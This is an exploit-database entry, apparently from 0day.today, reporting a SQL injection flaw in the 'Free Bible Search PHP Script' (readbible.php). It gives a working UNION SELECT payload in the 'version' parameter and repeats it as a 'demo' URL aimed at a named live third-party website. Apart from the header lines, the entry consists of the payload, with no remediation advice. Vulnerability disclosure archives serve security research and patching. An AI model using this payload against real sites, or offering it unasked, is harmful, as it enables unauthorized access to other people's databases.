id: 4684
date: 01/15/2009
title: Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability
author: nuclear
cves: 

========================================================================
Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability
========================================================================


#Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability


#Author: nuclear


#site:
http://www.seraphimtech.net/?q=node/6


#vuln:
http://localhost/[path]/readbible.php?version=kjv%20union%20select%20@@version--

#demo:
http://www.lordblessthee.com/bible/readbible.php?version=kjv%20union%20select%20@@version--



#  0day.today [2023-03-23]  #